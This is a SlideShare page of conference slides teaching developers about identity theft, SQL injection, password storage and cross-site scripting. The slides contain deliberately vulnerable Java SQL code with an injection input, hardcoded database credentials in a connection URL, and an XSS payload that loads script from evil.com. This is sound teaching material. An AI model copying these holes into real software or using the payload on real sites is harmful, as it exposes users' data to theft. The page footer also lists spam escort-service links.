SlideShare a Scribd company logo

Identity theft developers key to protecting data at JavaZone 2017

Brian Vermeer
Brian Vermeer

Identity theft: Developers are key Talk at JavaZone 2017 - Oslo, Norway

Software
1 of 33
Download to read offline
Identity theft developers are key JavaZone 2017
Identity theft Cybercrime Hard to get rid of the consequences
 We create the code We protect the data
Are we part of the solution Or part of the problem?
Brian Vermeer Software Engineer
Cybercrime Real threat and it is growing Organised and professional it’s a business
 Risks are low We are not ready Lot of money involved
How profitable is cybercrime? Bank of Iraq Heist (2003) 
 1 Billion dollars US Military and Defence Expanses (2015)
 600 Billion dollars Cyber crime damage world wide (2016)
 3 Trillion dollars
Identity theft Identity theft is the deliberate use of someone else's identity, usually as a method to gain a financial advantage or obtain credit and other benefits in the other person's name, and perhaps to the other person's disadvantage or loss. The person whose identity has been assumed may suffer adverse consequences if they are held responsible for the perpetrator's actions.
Kevin Goes (30) Some else used a copy of his passport
 
 and rented several houses
Kevin Goes (30)
Data is like crude oil by itself it is dead, but comes to live when applying the right kind of science
What can we do as developers Protect yourself & be aware
Protect youself Where do I leave my notebook ? Where do I store my passwords ? Do I use my password multiple times ? Is my software up to date ? 2 step verification ? What wifi hotspot do I use ?
Software Development
Our application What we think it is What it actually is
How many dependencies? Are all needed? Are all up-to-date? Are all reliable? Dependencies
Don't trust blindly
Security as part of your development process business value VS security code reviews clean code = secure code
OWASP - ASVS Open Web Application Security Project Application Security Verification Standard https://www.owasp.org/index.php/ Category:OWASP_Application_Securit y_Verification_Standard_Project
Code review String url = "jdbc:postgresql://localhost:5432/test?user=brian&password=brian";
 Connection conn = DriverManager.getConnection(url);
 Statement stmt = conn.createStatement();
 
 String newName = request.getParameter("name");
 String sql = "UPDATE Users SET name = '" + newName + "' WHERE id=1";
 
 stmt.execute(sql);
Code review String url = "jdbc:postgresql://localhost:5432/test?user=brian&password=brian";
 Connection conn = DriverManager.getConnection(url);
 Statement stmt = conn.createStatement();
 
 String newName = request.getParameter("name");
 String sql = "UPDATE Users SET name = '" + newName + "' WHERE id=1";
 
 stmt.execute(sql); what if my input = ' '; ' UPDATE USERS SET NAME =' '; ' WHERE id=1;
SQL Injection String url = "jdbc:postgresql://localhost:5432/test?user=brian&password=brian";
 Connection conn = DriverManager.getConnection(url);
 Statement stmt = conn.createStatement();
 
 String newName = request.getParameter("name");
 String sql = "UPDATE Users SET name = '" + newName + "' WHERE id=1";
 
 stmt.execute(sql); what if my input = ' '; UPDATE Users SET name = ' ' UPDATE USERS SET NAME =' '; UPDATE Users SET name = '' WHERE id=1;
Query Parameterization String url = "jdbc:postgresql://localhost:5432/test?user=brian&password=brian";
 Connection conn = DriverManager.getConnection(url);
 
 String newName = request.getParameter("name");
 String sql = "UPDATE Users SET name = ? WHERE id=1";
 
 PreparedStatement pstmt = conn.prepareStatement(sql);
 pstmt.setString(1, newName);
 pstmt.executeUpdate();
Password storage
Password protection Don’t store plain text Don’t limit the password length Don’t limit the character set Don’t use an ordinary hash function
Password protection Use a password policy Use a cryptographically strong credential-specific salt Use a cryptographic hash algorithm (e.g. PBKDF2) Use a HMAC (keyed-hash message authentication code), HMAC-SHA256 Design to be compromised
XSS (Cross Side Scripting) http://www.javazone.no/saveComment?comment=JavaZone+is+Awesome! <h3> Thank you for you comments! </h3> You wrote: <p/> JavaZone is Awesome <p/>
XSS (Cross Site Scripting) http://www.javazone.no/saveComment?comment=<script src="evil.com/ x.js"></script> <h3> Thank you for you comments! </h3> You wrote: <p/> <script src="evil.com/x.js"></script> <p/>
Summary BE AWARE Protect yourself Integrate security in development process https://www.owasp.org
 ASVS
Brian Vermeer @BrianVerm brian@brianvermeer.nl

Recommended

Identity Theft : Developers are key
Identity Theft : Developers are keyIdentity Theft : Developers are key
Identity Theft : Developers are keyBrian Vermeer
 
Identity theft jfall17
Identity theft jfall17Identity theft jfall17
Identity theft jfall17Brian Vermeer
 
Identity theft: Developers are key - JFokus 2017
Identity theft: Developers are key - JFokus 2017Identity theft: Developers are key - JFokus 2017
Identity theft: Developers are key - JFokus 2017Brian Vermeer
 
Identity theft blue4it nljug
Identity theft blue4it nljugIdentity theft blue4it nljug
Identity theft blue4it nljugBrian Vermeer
 
Lviv js2017 (eleks)
Lviv js2017 (eleks)Lviv js2017 (eleks)
Lviv js2017 (eleks)Андрей Вандакуров
 
Phu appsec13
Phu appsec13Phu appsec13
Phu appsec13drewz lin
 
Ghost in the Browser: Broad-Scale Espionage with Bitsquatting
Ghost in the Browser: Broad-Scale Espionage with Bitsquatting Ghost in the Browser: Broad-Scale Espionage with Bitsquatting
Ghost in the Browser: Broad-Scale Espionage with BitsquattingBishop Fox
 
VodQA3_PenetrationTesting_AmitDhakkad
VodQA3_PenetrationTesting_AmitDhakkadVodQA3_PenetrationTesting_AmitDhakkad
VodQA3_PenetrationTesting_AmitDhakkadvodQA
 

Recommended

Identity Theft : Developers are key
Identity Theft : Developers are keyIdentity Theft : Developers are key
Identity Theft : Developers are keyBrian Vermeer
 
Identity theft jfall17
Identity theft jfall17Identity theft jfall17
Identity theft jfall17Brian Vermeer
 
Identity theft: Developers are key - JFokus 2017
Identity theft: Developers are key - JFokus 2017Identity theft: Developers are key - JFokus 2017
Identity theft: Developers are key - JFokus 2017Brian Vermeer
 
Identity theft blue4it nljug
Identity theft blue4it nljugIdentity theft blue4it nljug
Identity theft blue4it nljugBrian Vermeer
 
Lviv js2017 (eleks)
Lviv js2017 (eleks)Lviv js2017 (eleks)
Lviv js2017 (eleks)Андрей Вандакуров
 
Phu appsec13
Phu appsec13Phu appsec13
Phu appsec13drewz lin
 
Ghost in the Browser: Broad-Scale Espionage with Bitsquatting
Ghost in the Browser: Broad-Scale Espionage with Bitsquatting Ghost in the Browser: Broad-Scale Espionage with Bitsquatting
Ghost in the Browser: Broad-Scale Espionage with BitsquattingBishop Fox
 
VodQA3_PenetrationTesting_AmitDhakkad
VodQA3_PenetrationTesting_AmitDhakkadVodQA3_PenetrationTesting_AmitDhakkad
VodQA3_PenetrationTesting_AmitDhakkadvodQA
 
Csrf not-all-defenses-are-created-equal
Csrf not-all-defenses-are-created-equalCsrf not-all-defenses-are-created-equal
Csrf not-all-defenses-are-created-equaldrewz lin
 
Believe It Or Not SSL Attacks
Believe It Or Not SSL AttacksBelieve It Or Not SSL Attacks
Believe It Or Not SSL AttacksAkash Mahajan
 
RSA Conference 2010 San Francisco
RSA Conference 2010 San FranciscoRSA Conference 2010 San Francisco
RSA Conference 2010 San FranciscoAditya K Sood
 
ExpertsLiveEurope The New Era Of Endpoint Security
ExpertsLiveEurope The New Era Of Endpoint SecurityExpertsLiveEurope The New Era Of Endpoint Security
ExpertsLiveEurope The New Era Of Endpoint SecurityAlexander Benoit
 
Building the Security Operations and SIEM Use CAse
Building the Security Operations and SIEM Use CAseBuilding the Security Operations and SIEM Use CAse
Building the Security Operations and SIEM Use CAseDon Murdoch GSE CyberGuardian CISSP
 
Hacking the Web
Hacking the WebHacking the Web
Hacking the WebMike Crabb
 
Atelier Technique - F5 - #ACSS2019
Atelier Technique - F5 - #ACSS2019Atelier Technique - F5 - #ACSS2019
Atelier Technique - F5 - #ACSS2019African Cyber Security Summit
 
Jul outlook malware18
Jul outlook malware18Jul outlook malware18
Jul outlook malware18Setia Juli Irzal Ismail
 
Xss (cross site scripting)
Xss (cross site scripting)Xss (cross site scripting)
Xss (cross site scripting)vinayh.vaghamshi _
 
Hacking web applications
Hacking web applicationsHacking web applications
Hacking web applicationsphanleson
 
Raising the dead to save the living
Raising the dead to save the livingRaising the dead to save the living
Raising the dead to save the livingJaredPeck
 
Web Security 101
Web Security 101Web Security 101
Web Security 101Michael Peters
 
Overview of Microsoft Sql Server Security
Overview of Microsoft Sql Server SecurityOverview of Microsoft Sql Server Security
Overview of Microsoft Sql Server SecurityGary Manley, MA, PMP
 
Model pretnji za image pass - zoss
Model pretnji za image pass - zossModel pretnji za image pass - zoss
Model pretnji za image pass - zossMilan Lukic
 
Bulletproof
BulletproofBulletproof
BulletproofGodfrey Nolan
 
Java script, security and you - Tri-Cities Javascript Developers Group
Java script, security and you - Tri-Cities Javascript Developers GroupJava script, security and you - Tri-Cities Javascript Developers Group
Java script, security and you - Tri-Cities Javascript Developers GroupAdam Caudill
 
Automating your SOC/CSIRT - The case study: Pescatore a real time URL Classifier
Automating your SOC/CSIRT - The case study: Pescatore a real time URL ClassifierAutomating your SOC/CSIRT - The case study: Pescatore a real time URL Classifier
Automating your SOC/CSIRT - The case study: Pescatore a real time URL ClassifierRoberto Sponchioni
 
Nguyen phuong truong anh a story of bug bounty hunter
Nguyen phuong truong anh a story of bug bounty hunterNguyen phuong truong anh a story of bug bounty hunter
Nguyen phuong truong anh a story of bug bounty hunterSecurity Bootcamp
 
Reflective and Stored XSS- Cross Site Scripting
Reflective and Stored XSS- Cross Site ScriptingReflective and Stored XSS- Cross Site Scripting
Reflective and Stored XSS- Cross Site ScriptingInMobi Technology
 
Application Security 101 (OWASP DC)
Application Security 101 (OWASP DC)Application Security 101 (OWASP DC)
Application Security 101 (OWASP DC)mikemcbryde
 
Web Security
Web SecurityWeb Security
Web SecurityGerald Villorente
 
Big security for big data
Big security for big dataBig security for big data
Big security for big dataAri Elias-Bachrach
 

More Related Content

What's hot

Csrf not-all-defenses-are-created-equal
Csrf not-all-defenses-are-created-equalCsrf not-all-defenses-are-created-equal
Csrf not-all-defenses-are-created-equaldrewz lin
 
Believe It Or Not SSL Attacks
Believe It Or Not SSL AttacksBelieve It Or Not SSL Attacks
Believe It Or Not SSL AttacksAkash Mahajan
 
RSA Conference 2010 San Francisco
RSA Conference 2010 San FranciscoRSA Conference 2010 San Francisco
RSA Conference 2010 San FranciscoAditya K Sood
 
ExpertsLiveEurope The New Era Of Endpoint Security
ExpertsLiveEurope The New Era Of Endpoint SecurityExpertsLiveEurope The New Era Of Endpoint Security
ExpertsLiveEurope The New Era Of Endpoint SecurityAlexander Benoit
 
Hacking the Web
Hacking the WebHacking the Web
Hacking the WebMike Crabb
 
Hacking web applications
Hacking web applicationsHacking web applications
Hacking web applicationsphanleson
 
Raising the dead to save the living
Raising the dead to save the livingRaising the dead to save the living
Raising the dead to save the livingJaredPeck
 
Overview of Microsoft Sql Server Security
Overview of Microsoft Sql Server SecurityOverview of Microsoft Sql Server Security
Overview of Microsoft Sql Server SecurityGary Manley, MA, PMP
 
Model pretnji za image pass - zoss
Model pretnji za image pass - zossModel pretnji za image pass - zoss
Model pretnji za image pass - zossMilan Lukic
 
Java script, security and you - Tri-Cities Javascript Developers Group
Java script, security and you - Tri-Cities Javascript Developers GroupJava script, security and you - Tri-Cities Javascript Developers Group
Java script, security and you - Tri-Cities Javascript Developers GroupAdam Caudill
 
Automating your SOC/CSIRT - The case study: Pescatore a real time URL Classifier
Automating your SOC/CSIRT - The case study: Pescatore a real time URL ClassifierAutomating your SOC/CSIRT - The case study: Pescatore a real time URL Classifier
Automating your SOC/CSIRT - The case study: Pescatore a real time URL ClassifierRoberto Sponchioni
 
Nguyen phuong truong anh a story of bug bounty hunter
Nguyen phuong truong anh a story of bug bounty hunterNguyen phuong truong anh a story of bug bounty hunter
Nguyen phuong truong anh a story of bug bounty hunterSecurity Bootcamp
 
Reflective and Stored XSS- Cross Site Scripting
Reflective and Stored XSS- Cross Site ScriptingReflective and Stored XSS- Cross Site Scripting
Reflective and Stored XSS- Cross Site ScriptingInMobi Technology
 

What's hot (19)

Csrf not-all-defenses-are-created-equal
Csrf not-all-defenses-are-created-equalCsrf not-all-defenses-are-created-equal
Csrf not-all-defenses-are-created-equal
 
Believe It Or Not SSL Attacks
Believe It Or Not SSL AttacksBelieve It Or Not SSL Attacks
Believe It Or Not SSL Attacks
 
RSA Conference 2010 San Francisco
RSA Conference 2010 San FranciscoRSA Conference 2010 San Francisco
RSA Conference 2010 San Francisco
 
ExpertsLiveEurope The New Era Of Endpoint Security
ExpertsLiveEurope The New Era Of Endpoint SecurityExpertsLiveEurope The New Era Of Endpoint Security
ExpertsLiveEurope The New Era Of Endpoint Security
 
Building the Security Operations and SIEM Use CAse
Building the Security Operations and SIEM Use CAseBuilding the Security Operations and SIEM Use CAse
Building the Security Operations and SIEM Use CAse
 
Hacking the Web
Hacking the WebHacking the Web
Hacking the Web
 
Atelier Technique - F5 - #ACSS2019
Atelier Technique - F5 - #ACSS2019Atelier Technique - F5 - #ACSS2019
Atelier Technique - F5 - #ACSS2019
 
Jul outlook malware18
Jul outlook malware18Jul outlook malware18
Jul outlook malware18
 
Xss (cross site scripting)
Xss (cross site scripting)Xss (cross site scripting)
Xss (cross site scripting)
 
Hacking web applications
Hacking web applicationsHacking web applications
Hacking web applications
 
Raising the dead to save the living
Raising the dead to save the livingRaising the dead to save the living
Raising the dead to save the living
 
Web Security 101
Web Security 101Web Security 101
Web Security 101
 
Overview of Microsoft Sql Server Security
Overview of Microsoft Sql Server SecurityOverview of Microsoft Sql Server Security
Overview of Microsoft Sql Server Security
 
Model pretnji za image pass - zoss
Model pretnji za image pass - zossModel pretnji za image pass - zoss
Model pretnji za image pass - zoss
 
Bulletproof
BulletproofBulletproof
Bulletproof
 
Java script, security and you - Tri-Cities Javascript Developers Group
Java script, security and you - Tri-Cities Javascript Developers GroupJava script, security and you - Tri-Cities Javascript Developers Group
Java script, security and you - Tri-Cities Javascript Developers Group
 
Automating your SOC/CSIRT - The case study: Pescatore a real time URL Classifier
Automating your SOC/CSIRT - The case study: Pescatore a real time URL ClassifierAutomating your SOC/CSIRT - The case study: Pescatore a real time URL Classifier
Automating your SOC/CSIRT - The case study: Pescatore a real time URL Classifier
 
Nguyen phuong truong anh a story of bug bounty hunter
Nguyen phuong truong anh a story of bug bounty hunterNguyen phuong truong anh a story of bug bounty hunter
Nguyen phuong truong anh a story of bug bounty hunter
 
Reflective and Stored XSS- Cross Site Scripting
Reflective and Stored XSS- Cross Site ScriptingReflective and Stored XSS- Cross Site Scripting
Reflective and Stored XSS- Cross Site Scripting
 

Similar to Identity theft developers key to protecting data at JavaZone 2017

Application Security 101 (OWASP DC)
Application Security 101 (OWASP DC)Application Security 101 (OWASP DC)
Application Security 101 (OWASP DC)mikemcbryde
 
Security of Web Applications: Top 6 Risks To Avoid
Security of Web Applications: Top 6 Risks To AvoidSecurity of Web Applications: Top 6 Risks To Avoid
Security of Web Applications: Top 6 Risks To Avoidslicklash
 
[OPD 2019] Threat modeling at scale
[OPD 2019] Threat modeling at scale[OPD 2019] Threat modeling at scale
[OPD 2019] Threat modeling at scaleOWASP
 
3rd Party Cyber Security: Manage your ecosystem!
3rd Party Cyber Security: Manage your ecosystem!3rd Party Cyber Security: Manage your ecosystem!
3rd Party Cyber Security: Manage your ecosystem!NormShield, Inc.
 
PCI Security Requirements - secure coding
PCI Security Requirements - secure codingPCI Security Requirements - secure coding
PCI Security Requirements - secure codingHaitham Raik
 
Application Security around OWASP Top 10
Application Security around OWASP Top 10Application Security around OWASP Top 10
Application Security around OWASP Top 10Sastry Tumuluri
 
Widespread security flaws in web application development 2015
Widespread security flaws in web application development 2015Widespread security flaws in web application development 2015
Widespread security flaws in web application development 2015mahchiev
 
Discovering the Value of Verifying Web Application Security Using IBM Rationa...
Discovering the Value of Verifying Web Application Security Using IBM Rationa...Discovering the Value of Verifying Web Application Security Using IBM Rationa...
Discovering the Value of Verifying Web Application Security Using IBM Rationa...Alan Kan
 
SQL Injections - 2016 - Huntington Beach
SQL Injections - 2016 - Huntington BeachSQL Injections - 2016 - Huntington Beach
SQL Injections - 2016 - Huntington BeachJeff Prom
 
Owasp.meet up.2017.ppt
Owasp.meet up.2017.pptOwasp.meet up.2017.ppt
Owasp.meet up.2017.pptSul Haedir
 
Solvay secure application layer v2015 seba
Solvay secure application layer v2015 sebaSolvay secure application layer v2015 seba
Solvay secure application layer v2015 sebaSebastien Deleersnyder
 

Similar to Identity theft developers key to protecting data at JavaZone 2017 (20)

Application Security 101 (OWASP DC)
Application Security 101 (OWASP DC)Application Security 101 (OWASP DC)
Application Security 101 (OWASP DC)
 
Web Security
Web SecurityWeb Security
Web Security
 
Big security for big data
Big security for big dataBig security for big data
Big security for big data
 
Security of Web Applications: Top 6 Risks To Avoid
Security of Web Applications: Top 6 Risks To AvoidSecurity of Web Applications: Top 6 Risks To Avoid
Security of Web Applications: Top 6 Risks To Avoid
 
[OPD 2019] Threat modeling at scale
[OPD 2019] Threat modeling at scale[OPD 2019] Threat modeling at scale
[OPD 2019] Threat modeling at scale
 
Network security
Network securityNetwork security
Network security
 
NetworkSecurity
NetworkSecurityNetworkSecurity
NetworkSecurity
 
Starwest 2008
Starwest 2008Starwest 2008
Starwest 2008
 
3rd Party Cyber Security: Manage your ecosystem!
3rd Party Cyber Security: Manage your ecosystem!3rd Party Cyber Security: Manage your ecosystem!
3rd Party Cyber Security: Manage your ecosystem!
 
PHPUG Presentation
PHPUG PresentationPHPUG Presentation
PHPUG Presentation
 
PCI Security Requirements - secure coding
PCI Security Requirements - secure codingPCI Security Requirements - secure coding
PCI Security Requirements - secure coding
 
Application Security around OWASP Top 10
Application Security around OWASP Top 10Application Security around OWASP Top 10
Application Security around OWASP Top 10
 
Information security
Information securityInformation security
Information security
 
Widespread security flaws in web application development 2015
Widespread security flaws in web application development 2015Widespread security flaws in web application development 2015
Widespread security flaws in web application development 2015
 
Hackers vs developers
Hackers vs developersHackers vs developers
Hackers vs developers
 
Discovering the Value of Verifying Web Application Security Using IBM Rationa...
Discovering the Value of Verifying Web Application Security Using IBM Rationa...Discovering the Value of Verifying Web Application Security Using IBM Rationa...
Discovering the Value of Verifying Web Application Security Using IBM Rationa...
 
SQL Injections - 2016 - Huntington Beach
SQL Injections - 2016 - Huntington BeachSQL Injections - 2016 - Huntington Beach
SQL Injections - 2016 - Huntington Beach
 
ASP.NET Web Security
ASP.NET Web SecurityASP.NET Web Security
ASP.NET Web Security
 
Owasp.meet up.2017.ppt
Owasp.meet up.2017.pptOwasp.meet up.2017.ppt
Owasp.meet up.2017.ppt
 
Solvay secure application layer v2015 seba
Solvay secure application layer v2015 sebaSolvay secure application layer v2015 seba
Solvay secure application layer v2015 seba
 

More from Brian Vermeer

Stranger Danger: Your Java Attack Surface Just Got Bigger | JBCNConf 2022
Stranger Danger: Your Java Attack Surface Just Got Bigger | JBCNConf 2022Stranger Danger: Your Java Attack Surface Just Got Bigger | JBCNConf 2022
Stranger Danger: Your Java Attack Surface Just Got Bigger | JBCNConf 2022Brian Vermeer
 
Teqnation 19 - Live Hacking
Teqnation 19 - Live Hacking Teqnation 19 - Live Hacking
Teqnation 19 - Live Hacking Brian Vermeer
 
Don't be a trojan - Codemotion Amsterdam 2019
Don't be a trojan - Codemotion Amsterdam 2019Don't be a trojan - Codemotion Amsterdam 2019
Don't be a trojan - Codemotion Amsterdam 2019Brian Vermeer
 
Writing better functional java code devnexus
Writing better functional java code devnexusWriting better functional java code devnexus
Writing better functional java code devnexusBrian Vermeer
 
Writing better functional java code - devnexus
Writing better functional java code - devnexusWriting better functional java code - devnexus
Writing better functional java code - devnexusBrian Vermeer
 
Common mistakes functional java snyk
Common mistakes functional java snykCommon mistakes functional java snyk
Common mistakes functional java snykBrian Vermeer
 
Don't be a trojan - Java2Days 2018
Don't be a trojan - Java2Days 2018Don't be a trojan - Java2Days 2018
Don't be a trojan - Java2Days 2018Brian Vermeer
 
Common mistakes made with Functional Java
Common mistakes made with Functional JavaCommon mistakes made with Functional Java
Common mistakes made with Functional JavaBrian Vermeer
 
Common mistakes functional java devoxx
Common mistakes functional java devoxxCommon mistakes functional java devoxx
Common mistakes functional java devoxxBrian Vermeer
 
Common mistakes functional java | Oracle Code One 2018
Common mistakes functional java | Oracle Code One 2018Common mistakes functional java | Oracle Code One 2018
Common mistakes functional java | Oracle Code One 2018Brian Vermeer
 
Common mistakes functional java vjug
Common mistakes functional java vjugCommon mistakes functional java vjug
Common mistakes functional java vjugBrian Vermeer
 
Ten common mistakes made with Functional Java JBCNConf18
Ten common mistakes made with Functional Java JBCNConf18Ten common mistakes made with Functional Java JBCNConf18
Ten common mistakes made with Functional Java JBCNConf18Brian Vermeer
 
Ten common mistakes made in Function Java
Ten common mistakes made in Function JavaTen common mistakes made in Function Java
Ten common mistakes made in Function JavaBrian Vermeer
 
Ten common mistakes made in Function Java - iSense Java Summit
Ten common mistakes made in Function Java - iSense Java SummitTen common mistakes made in Function Java - iSense Java Summit
Ten common mistakes made in Function Java - iSense Java SummitBrian Vermeer
 
Java8 tgtbatu devoxxuk18
Java8 tgtbatu devoxxuk18Java8 tgtbatu devoxxuk18
Java8 tgtbatu devoxxuk18Brian Vermeer
 
Ten mistakes functional java
Ten mistakes functional javaTen mistakes functional java
Ten mistakes functional javaBrian Vermeer
 
Java(8) The Good, The Bad and the Ugly
Java(8) The Good, The Bad and the UglyJava(8) The Good, The Bad and the Ugly
Java(8) The Good, The Bad and the UglyBrian Vermeer
 
Java8 tgtbatu javaone
Java8 tgtbatu javaoneJava8 tgtbatu javaone
Java8 tgtbatu javaoneBrian Vermeer
 
Java 8: the good, the bad and the ugly (JBCNConf 2017)
Java 8: the good, the bad and the ugly (JBCNConf 2017)Java 8: the good, the bad and the ugly (JBCNConf 2017)
Java 8: the good, the bad and the ugly (JBCNConf 2017)Brian Vermeer
 

More from Brian Vermeer (20)

Stranger Danger: Your Java Attack Surface Just Got Bigger | JBCNConf 2022
Stranger Danger: Your Java Attack Surface Just Got Bigger | JBCNConf 2022Stranger Danger: Your Java Attack Surface Just Got Bigger | JBCNConf 2022
Stranger Danger: Your Java Attack Surface Just Got Bigger | JBCNConf 2022
 
Teqnation 19 - Live Hacking
Teqnation 19 - Live Hacking Teqnation 19 - Live Hacking
Teqnation 19 - Live Hacking
 
Don't be a trojan - Codemotion Amsterdam 2019
Don't be a trojan - Codemotion Amsterdam 2019Don't be a trojan - Codemotion Amsterdam 2019
Don't be a trojan - Codemotion Amsterdam 2019
 
Writing better functional java code devnexus
Writing better functional java code devnexusWriting better functional java code devnexus
Writing better functional java code devnexus
 
Writing better functional java code - devnexus
Writing better functional java code - devnexusWriting better functional java code - devnexus
Writing better functional java code - devnexus
 
Common mistakes functional java snyk
Common mistakes functional java snykCommon mistakes functional java snyk
Common mistakes functional java snyk
 
Don't be a trojan - Java2Days 2018
Don't be a trojan - Java2Days 2018Don't be a trojan - Java2Days 2018
Don't be a trojan - Java2Days 2018
 
Common mistakes made with Functional Java
Common mistakes made with Functional JavaCommon mistakes made with Functional Java
Common mistakes made with Functional Java
 
Common mistakes functional java devoxx
Common mistakes functional java devoxxCommon mistakes functional java devoxx
Common mistakes functional java devoxx
 
Common mistakes functional java | Oracle Code One 2018
Common mistakes functional java | Oracle Code One 2018Common mistakes functional java | Oracle Code One 2018
Common mistakes functional java | Oracle Code One 2018
 
Common mistakes functional java vjug
Common mistakes functional java vjugCommon mistakes functional java vjug
Common mistakes functional java vjug
 
Don't be a Trojan
Don't be a TrojanDon't be a Trojan
Don't be a Trojan
 
Ten common mistakes made with Functional Java JBCNConf18
Ten common mistakes made with Functional Java JBCNConf18Ten common mistakes made with Functional Java JBCNConf18
Ten common mistakes made with Functional Java JBCNConf18
 
Ten common mistakes made in Function Java
Ten common mistakes made in Function JavaTen common mistakes made in Function Java
Ten common mistakes made in Function Java
 
Ten common mistakes made in Function Java - iSense Java Summit
Ten common mistakes made in Function Java - iSense Java SummitTen common mistakes made in Function Java - iSense Java Summit
Ten common mistakes made in Function Java - iSense Java Summit
 
Java8 tgtbatu devoxxuk18
Java8 tgtbatu devoxxuk18Java8 tgtbatu devoxxuk18
Java8 tgtbatu devoxxuk18
 
Ten mistakes functional java
Ten mistakes functional javaTen mistakes functional java
Ten mistakes functional java
 
Java(8) The Good, The Bad and the Ugly
Java(8) The Good, The Bad and the UglyJava(8) The Good, The Bad and the Ugly
Java(8) The Good, The Bad and the Ugly
 
Java8 tgtbatu javaone
Java8 tgtbatu javaoneJava8 tgtbatu javaone
Java8 tgtbatu javaone
 
Java 8: the good, the bad and the ugly (JBCNConf 2017)
Java 8: the good, the bad and the ugly (JBCNConf 2017)Java 8: the good, the bad and the ugly (JBCNConf 2017)
Java 8: the good, the bad and the ugly (JBCNConf 2017)
 

Recently uploaded

Building Real-Time Data Pipelines: Stream & Batch Processing workshop Slide
Building Real-Time Data Pipelines: Stream & Batch Processing workshop SlideBuilding Real-Time Data Pipelines: Stream & Batch Processing workshop Slide
Building Real-Time Data Pipelines: Stream & Batch Processing workshop SlideChristina Lin
 
5 Signs You Need a Fashion PLM Software.pdf
5 Signs You Need a Fashion PLM Software.pdf5 Signs You Need a Fashion PLM Software.pdf
5 Signs You Need a Fashion PLM Software.pdfWave PLM
 
Building a General PDE Solving Framework with Symbolic-Numeric Scientific Mac...
Building a General PDE Solving Framework with Symbolic-Numeric Scientific Mac...Building a General PDE Solving Framework with Symbolic-Numeric Scientific Mac...
Building a General PDE Solving Framework with Symbolic-Numeric Scientific Mac...stazi3110
 
A Secure and Reliable Document Management System is Essential.docx
A Secure and Reliable Document Management System is Essential.docxA Secure and Reliable Document Management System is Essential.docx
A Secure and Reliable Document Management System is Essential.docxComplianceQuest1
 
Diamond Application Development Crafting Solutions with Precision
Diamond Application Development Crafting Solutions with PrecisionDiamond Application Development Crafting Solutions with Precision
Diamond Application Development Crafting Solutions with PrecisionSolGuruz
 
Unlocking the Future of AI Agents with Large Language Models
Unlocking the Future of AI Agents with Large Language ModelsUnlocking the Future of AI Agents with Large Language Models
Unlocking the Future of AI Agents with Large Language Modelsaagamshah0812
 
Der Spagat zwischen BIAS und FAIRNESS (2024)
Der Spagat zwischen BIAS und FAIRNESS (2024)Der Spagat zwischen BIAS und FAIRNESS (2024)
Der Spagat zwischen BIAS und FAIRNESS (2024)OPEN KNOWLEDGE GmbH
 
TECUNIQUE: Success Stories: IT Service provider
TECUNIQUE: Success Stories: IT Service providerTECUNIQUE: Success Stories: IT Service provider
TECUNIQUE: Success Stories: IT Service providermohitmore19
 
Professional Resume Template for Software Developers
Professional Resume Template for Software DevelopersProfessional Resume Template for Software Developers
Professional Resume Template for Software DevelopersVinodh Ram
 
Try MyIntelliAccount Cloud Accounting Software As A Service Solution Risk Fre...
Try MyIntelliAccount Cloud Accounting Software As A Service Solution Risk Fre...Try MyIntelliAccount Cloud Accounting Software As A Service Solution Risk Fre...
Try MyIntelliAccount Cloud Accounting Software As A Service Solution Risk Fre...MyIntelliSource, Inc.
 
Russian Call Girls in Karol Bagh Aasnvi ➡️ 8264348440 💋📞 Independent Escort S...
Russian Call Girls in Karol Bagh Aasnvi ➡️ 8264348440 💋📞 Independent Escort S...Russian Call Girls in Karol Bagh Aasnvi ➡️ 8264348440 💋📞 Independent Escort S...
Russian Call Girls in Karol Bagh Aasnvi ➡️ 8264348440 💋📞 Independent Escort S...soniya singh
 
What is Binary Language? Computer Number Systems
What is Binary Language? Computer Number SystemsWhat is Binary Language? Computer Number Systems
What is Binary Language? Computer Number SystemsJheuzeDellosa
 
Hand gesture recognition PROJECT PPT.pptx
Hand gesture recognition PROJECT PPT.pptxHand gesture recognition PROJECT PPT.pptx
Hand gesture recognition PROJECT PPT.pptxbodapatigopi8531
 
Tech Tuesday-Harness the Power of Effective Resource Planning with OnePlan’s ...
Tech Tuesday-Harness the Power of Effective Resource Planning with OnePlan’s ...Tech Tuesday-Harness the Power of Effective Resource Planning with OnePlan’s ...
Tech Tuesday-Harness the Power of Effective Resource Planning with OnePlan’s ...OnePlan Solutions
 
Short Story: Unveiling the Reasoning Abilities of Large Language Models by Ke...
Short Story: Unveiling the Reasoning Abilities of Large Language Models by Ke...Short Story: Unveiling the Reasoning Abilities of Large Language Models by Ke...
Short Story: Unveiling the Reasoning Abilities of Large Language Models by Ke...kellynguyen01
 
Steps To Getting Up And Running Quickly With MyTimeClock Employee Scheduling ...
Steps To Getting Up And Running Quickly With MyTimeClock Employee Scheduling ...Steps To Getting Up And Running Quickly With MyTimeClock Employee Scheduling ...
Steps To Getting Up And Running Quickly With MyTimeClock Employee Scheduling ...MyIntelliSource, Inc.
 
HR Software Buyers Guide in 2024 - HRSoftware.com
HR Software Buyers Guide in 2024 - HRSoftware.comHR Software Buyers Guide in 2024 - HRSoftware.com
HR Software Buyers Guide in 2024 - HRSoftware.comFatema Valibhai
 
Software Quality Assurance Interview Questions
Software Quality Assurance Interview QuestionsSoftware Quality Assurance Interview Questions
Software Quality Assurance Interview QuestionsArshad QA
 
(Genuine) Escort Service Lucknow | Starting ₹,5K To @25k with A/C 🧑🏽‍❤️‍🧑🏻 89...
(Genuine) Escort Service Lucknow | Starting ₹,5K To @25k with A/C 🧑🏽‍❤️‍🧑🏻 89...(Genuine) Escort Service Lucknow | Starting ₹,5K To @25k with A/C 🧑🏽‍❤️‍🧑🏻 89...
(Genuine) Escort Service Lucknow | Starting ₹,5K To @25k with A/C 🧑🏽‍❤️‍🧑🏻 89...gurkirankumar98700
 

Recently uploaded (20)

Building Real-Time Data Pipelines: Stream & Batch Processing workshop Slide
Building Real-Time Data Pipelines: Stream & Batch Processing workshop SlideBuilding Real-Time Data Pipelines: Stream & Batch Processing workshop Slide
Building Real-Time Data Pipelines: Stream & Batch Processing workshop Slide
 
5 Signs You Need a Fashion PLM Software.pdf
5 Signs You Need a Fashion PLM Software.pdf5 Signs You Need a Fashion PLM Software.pdf
5 Signs You Need a Fashion PLM Software.pdf
 
Building a General PDE Solving Framework with Symbolic-Numeric Scientific Mac...
Building a General PDE Solving Framework with Symbolic-Numeric Scientific Mac...Building a General PDE Solving Framework with Symbolic-Numeric Scientific Mac...
Building a General PDE Solving Framework with Symbolic-Numeric Scientific Mac...
 
A Secure and Reliable Document Management System is Essential.docx
